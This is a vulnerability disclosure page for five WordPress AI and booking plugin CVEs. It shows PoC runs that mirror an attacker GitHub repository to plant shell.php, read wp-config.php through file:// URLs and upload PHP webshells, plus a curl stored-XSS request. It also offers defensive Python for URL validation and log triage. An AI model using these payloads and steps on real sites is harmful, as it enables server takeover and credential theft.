CVE-2025-13597

The AI Feeds WordPress plugin, versions 1.0.11 and below, contains an unauthenticated remote code execution vulnerability in actualizador_git.php. The file is reachable directly over HTTP with no authentication or authorization check, so an unauthenticated attacker can make the server fetch an attacker-chosen GitHub repository and mirror it over the plugin directory; a PHP file in that repository is then served by the site, giving remote code execution.

TL;DR Exploits

A PoC, CVE-2025-13597.py, is provided to demonstrate a remote attacker mirroring an attacker-controlled GitHub repository that contains shell.php into the plugin directory and running commands through it. The Spanish lines in the output are the plugin's own status messages (downloading the repository, removing extra entries, copying files, mirror applied at the plugin path):

python3 CVE-2025-13597.py -t http://techcorp.cc -o d0n601 -r minimal-rce -k github_pat_YOURKEY -c whoami
[*] Exploiting actualizador_git.php vulnerability...
[*] Downloading and installing shell from GitHub repository: d0n601/minimal-rce
Descargando d0n601/minimal-rce@main ...
Eliminando entradas extra...
Copiando archivos...
OK. Mirror aplicado en: /var/www/html/wp-content/plugins/ai-feeds

[*] Exploit executed. Checking if shell.php was created...

[*] Testing shell access...
www-data


[*] Shell should be accessible at:
    http://techcorp.cc/wp-content/plugins/ai-feeds/shell.php?cmd=COMMAND

Technical Analysis

The vulnerability exists in /wp-content/plugins/ai-feeds/actualizador_git.php. The file implements a GitHub repository mirroring routine and can be executed by any HTTP client: it is requested directly rather than loaded through WordPress, lacks the usual guard that aborts when ABSPATH is not defined, performs no login or capability check, and takes the repository to mirror from the request. Because the mirror is written over the plugin's own directory, whatever the repository contains is served as part of the site.

CVE-2025-13595

Summary

The Cibeles AI WordPress plugin, versions 1.10.8 and below, contains an unauthenticated remote code execution vulnerability in actualizador_git.php. The file is reachable directly over HTTP with no authentication or authorization check, so an unauthenticated attacker can make the server fetch an attacker-chosen GitHub repository and mirror it over the plugin directory; a PHP file in that repository is then served by the site, giving remote code execution.

TL;DR Exploits

A PoC, CVE-2025-13595.py, is provided to demonstrate a remote attacker mirroring an attacker-controlled GitHub repository that contains shell.php into the plugin directory and running commands through it. The Spanish lines in the output are the plugin's own status messages (downloading the repository, removing extra entries, copying files, mirror applied at the plugin path):

python3 CVE-2025-13595.py -t http://techcorp.cc -o d0n601 -r minimal-rce -k github_pat_YOURKEY -c whoami
[*] Exploiting actualizador_git.php vulnerability...
[*] Downloading and installing shell from GitHub repository: d0n601/minimal-rce
Descargando d0n601/minimal-rce@main ...
Eliminando entradas extra...
Copiando archivos...
OK. Mirror aplicado en: /var/www/html/wp-content/plugins/cibeles-ai

[*] Exploit executed. Checking if shell.php was created...

[*] Testing shell access...
www-data


[*] Shell should be accessible at:
    http://techcorp.cc/wp-content/plugins/cibeles-ai/shell.php?cmd=COMMAND

Technical Analysis

The vulnerability exists in /wp-content/plugins/cibeles-ai/actualizador_git.php. As with AI Feeds, the file implements a GitHub repository mirroring routine and can be executed by any HTTP client: it is requested directly rather than loaded through WordPress, lacks the usual guard that aborts when ABSPATH is not defined, performs no login or capability check, and takes the repository to mirror from the request. Because the mirror is written over the plugin's own directory, whatever the repository contains is served as part of the site.

CVE-2025-13380

The AI Engine for WordPress plugin contains a vulnerability in its image insertion feature that lets any authenticated user with post-editing capabilities (Contributor, Author, Editor, Administrator) read arbitrary files from the server. The lqdai_update_post AJAX endpoint performs no capability check of its own, and the insert_image() function it reaches passes a user-controlled URL to file_get_contents() without validating the URL scheme, so a file:// URL makes the server read a local file. As the PoC output shows, the result is then stored under wp-content/uploads with a .jpg suffix, where the attacker can fetch it over HTTP.

TL;DR Exploits

A PoC, CVE-2025-13380.py, is provided to demonstrate a Contributor-level user reading the site's wp-config.php:

python3 ./CVE-2025-13380.py http://techcorp.cc contributor password
[+] Target: http://techcorp.cc
[+] Username: contributor
[+] Nonce obtained: 5dc61a0166
[+] Post created with ID: 148
[+] File written to uploads directory
[+] Attempting to retrieve file from: http://techcorp.cc/wp-content/uploads/2025/11/varwwwhtmlwp-config.php.jpg
[+] File retrieved successfully!
[+] wp-config.php contents:
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
...
...
...

Details

File Insert Function

The lqdai_update_post AJAX action calls the update_post() function on line 315 of /wp-content/plugins/liquid-chatgpt/liquid-chatgpt.php. The only gate is that the caller can edit the post in question, which a Contributor satisfies with a draft of their own (the PoC creates one first); there is no further capability check before the request reaches insert_image() with a URL the caller controls:
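The check that insert_image() lacks, as an added example in Python rather than the plugin's PHP (this is not the plugin's code and none of the function names below are the plugin's): a server-side "fetch this image from a URL" feature must reject every scheme except http/https before the URL reaches a file-reading primitive, and, because the same primitive will happily fetch internal hosts, it should also refuse loopback, private and link-local addresses (the SSRF side of the same bug). Host names are not resolved here so the code runs offline; a caller that has resolved them passes the addresses in via resolved_ips.

```python
"""Fetch-URL validation of the kind insert_image() needs before calling a
file-reading primitive such as PHP's file_get_contents().

Added example (Python, offline): not code from the plugin. Rejects non-HTTP(S)
schemes (file://, php://, data:, ftp://, bare paths) and non-public addresses.
"""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _is_public(addr: str) -> bool:
    """True only for a globally routable unicast address."""
    ip = ipaddress.ip_address(addr)
    mapped = getattr(ip, "ipv4_mapped", None)  # ::ffff:127.0.0.1 -> 127.0.0.1
    if mapped is not None:
        ip = mapped
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_fetch_url(url: str, resolved_ips=()) -> tuple[bool, str]:
    """Return (ok, reason) for a user-supplied URL the server is asked to fetch."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        # file:///var/www/html/wp-config.php, php://filter/..., a bare path: all end here
        return False, f"scheme {scheme or '<none>'!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    if host == "localhost" or host.endswith(".localhost"):
        return False, "loopback host name"
    # IP literal written directly in the URL (127.0.0.1, [::1], 169.254.169.254)
    try:
        ipaddress.ip_address(host)
        literal = True
    except ValueError:
        literal = False
    if literal and not _is_public(host):
        return False, f"address {host} is not public"
    # Addresses the caller resolved the host name to. DNS-rebinding caveat: the
    # actual connection must be made to these vetted addresses, not a fresh lookup.
    for addr in resolved_ips:
        if not _is_public(addr):
            return False, f"host resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    for u in ("file:///var/www/html/wp-config.php",
              "http://169.254.169.254/latest/meta-data/",
              "https://example.com/a.jpg"):
        print(u, "->", check_fetch_url(u))
```

In WordPress itself the equivalent is wp_http_validate_url(), which wp_safe_remote_get() applies, rejecting non-http(s) schemes and loopback/private hosts; using that instead of file_get_contents() on the raw URL would have closed the file:// read. The URL check is not a substitute for the missing capability check on the AJAX action: both are needed, since a validated fetch still lets every Contributor make the server pull arbitrary remote content into the uploads directory.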

CVE-2025-12135

The WPBookit plugin neither checks the caller's permissions nor sanitizes the submitted custom CSS/JS in its save_custome_code AJAX endpoint. An unauthenticated attacker can therefore store arbitrary JavaScript that the plugin emits on every page load: a stored XSS that runs in every visitor's browser, with session hijacking as the obvious follow-on.

TL;DR Exploits

# Basic XSS injection
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "css_code=/* malicious */&js_code=alert('XSS');"

Details

The vulnerability exists in the save_custome_code method of the WPB_Setting_Controller class. The plugin registers its AJAX routes for logged-out users as well (the wp_ajax_nopriv_ hook), so any visitor can store CSS/JS that is then emitted on every page load. Because the feature exists to output arbitrary CSS/JS, the controlling fix is who may call the route (a capability check such as manage_options, with a nonce), not sanitization of the payload.

CVE-2025-12973

The WordPress S2B AI Assistant plugin (versions 2.47 and prior) contains an arbitrary file upload vulnerability that allows authenticated WordPress users with Editor role or higher to upload malicious PHP files to the server, potentially leading to remote code execution.

TL;DR Exploits

A PoC, CVE-2025-12973.py, is provided to demonstrate an Editor-level user uploading shell.php and executing commands through it:

python3 ./CVE-2025-12973.py http://techcorp.cc editor $PASSWORD
[+] Target: http://techcorp.cc
[+] Username: editor
[+] Nonce obtained: a15be47119
[+] File uploaded successfully!
[+] Shell URL: http://techcorp.cc/wp-content/uploads/2025/11/shell.php
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Technical Description

The vulnerability exists in the storeFile() method in Utils.php, reached through /wp-admin/admin-post.php with action s2b_store_chatbot_upload. The upload path uses its own file-extension whitelist, which explicitly includes PHP, instead of deferring to WordPress's upload checks (wp_handle_upload() with the default get_allowed_mime_types(), which do not permit PHP). An authenticated user with the Editor role or higher can therefore upload a .php file into wp-content/uploads, where the web server executes it.
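The request paths the PoCs on this page leave in web-server logs are specific enough to triage. The following is an added example (Python, constructed input), not part of any of the PoCs or the plugins: it parses combined-format access-log lines and flags hits on actualizador_git.php under the ai-feeds and cibeles-ai plugin directories (CVE-2025-13597, CVE-2025-13595), the save_custome_code route on admin-ajax.php (CVE-2025-12135), the lqdai_update_post action and the read-back of stripped-path upload names such as varwwwhtmlwp-config.php.jpg (CVE-2025-13380), and the s2b_store_chatbot_upload action plus any PHP served from wp-content/uploads (CVE-2025-12973). SAMPLE_LOG is constructed; its source IPs are documentation-range addresses. Actions sent only in a POST body do not appear in access logs, so the AJAX and admin-post rules match only when the action is in the query string, as in the curl PoC above; the file-path rules have no such limitation.

```python
"""Access-log triage for the plugin CVEs on this page.

Added example: not code from the PoCs or the plugins. Input is Apache/nginx
"combined"-style lines; SAMPLE_LOG is constructed for illustration.
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# client ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Plugin directories from the two actualizador_git.php advisories above
PLUGIN_DIRS = {
    "/wp-content/plugins/ai-feeds/": "CVE-2025-13597",
    "/wp-content/plugins/cibeles-ai/": "CVE-2025-13595",
}
UPLOADS = "/wp-content/uploads/"
EXEC_EXT = (".php", ".phtml", ".phar", ".php5", ".php7")


@dataclass
class Finding:
    cve: str
    reason: str
    ip: str
    method: str
    target: str
    status: int


def _query(target: str) -> dict:
    """First value of each query-string parameter."""
    return {k: v[0] for k, v in parse_qs(urlsplit(target).query).items()}


def classify(ip: str, method: str, target: str, status: int):
    """Return a Finding for one request, or None if nothing matched."""
    path = urlsplit(target).path
    q = _query(target)
    name = path.rsplit("/", 1)[-1].lower()

    def hit(cve, why):
        return Finding(cve, why, ip, method, target, status)

    for prefix, cve in PLUGIN_DIRS.items():
        if path.startswith(prefix):
            if name == "actualizador_git.php":
                return hit(cve, "direct request to unauthenticated repo-mirror script")
            if name.endswith(EXEC_EXT) and status == 200:
                return hit(cve, "PHP run directly from plugin dir (possible mirrored shell)")

    if path == "/wp-admin/admin-ajax.php":
        if q.get("action") == "wpb_ajax_post" and q.get("route_name") == "save_custome_code":
            return hit("CVE-2025-12135", "unauthenticated custom CSS/JS save route")
        if q.get("action") == "lqdai_update_post":
            return hit("CVE-2025-13380", "lqdai_update_post action in query string")

    if path == "/wp-admin/admin-post.php" and q.get("action") == "s2b_store_chatbot_upload":
        return hit("CVE-2025-12973", "chatbot upload action in query string")

    if path.startswith(UPLOADS):
        if name.endswith(EXEC_EXT) and status == 200:
            return hit("CVE-2025-12973", "PHP served from uploads dir (webshell)")
        if "wp-config" in name or re.search(r"\.(php|phtml|phar)\.\w+$", name):
            return hit("CVE-2025-13380", "upload name looks like a copied server file")

    return None


def scan(lines):
    """Parse log lines and return the findings in input order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # tolerate noise rather than abort the whole run
        f = classify(m["ip"], m["method"], m["target"], int(m["status"]))
        if f is not None:
            findings.append(f)
    return findings


# Constructed sample: the first six lines mirror the PoC runs shown on this
# page, the last two are benign traffic that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2025:10:01:02 +0000] "POST /wp-content/plugins/ai-feeds/actualizador_git.php HTTP/1.1" 200 143
203.0.113.7 - - [10/Nov/2025:10:01:05 +0000] "GET /wp-content/plugins/ai-feeds/shell.php?cmd=whoami HTTP/1.1" 200 9
203.0.113.7 - - [10/Nov/2025:10:02:11 +0000] "POST /wp-content/plugins/cibeles-ai/actualizador_git.php HTTP/1.1" 200 143
198.51.100.9 - - [10/Nov/2025:10:05:00 +0000] "POST /wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code HTTP/1.1" 200 27
198.51.100.9 - - [10/Nov/2025:10:06:30 +0000] "GET /wp-content/uploads/2025/11/varwwwhtmlwp-config.php.jpg HTTP/1.1" 200 3152
198.51.100.9 - - [10/Nov/2025:10:07:45 +0000] "GET /wp-content/uploads/2025/11/shell.php?cmd=id HTTP/1.1" 200 54
192.0.2.4 - - [10/Nov/2025:10:08:00 +0000] "GET /wp-content/uploads/2025/11/logo.png HTTP/1.1" 200 4096
192.0.2.4 - - [10/Nov/2025:10:08:01 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.cve}  {f.ip:<14} {f.method} {f.target}  [{f.reason}]")
```

A request to actualizador_git.php is flagged whatever the status code, since a 403 or 404 still records a probe for the vulnerable file; the "PHP executed from plugin dir" and "PHP served from uploads" rules require a 200, because a hardened server that refuses to execute PHP under uploads (the standard mitigation for CVE-2025-12973) will answer such requests with 403 and those are noise. The double-extension and wp-config name rules exist because the CVE-2025-13380 read leaves the copied file publicly fetchable, so the read-back is visible in the log even when the triggering AJAX call is not.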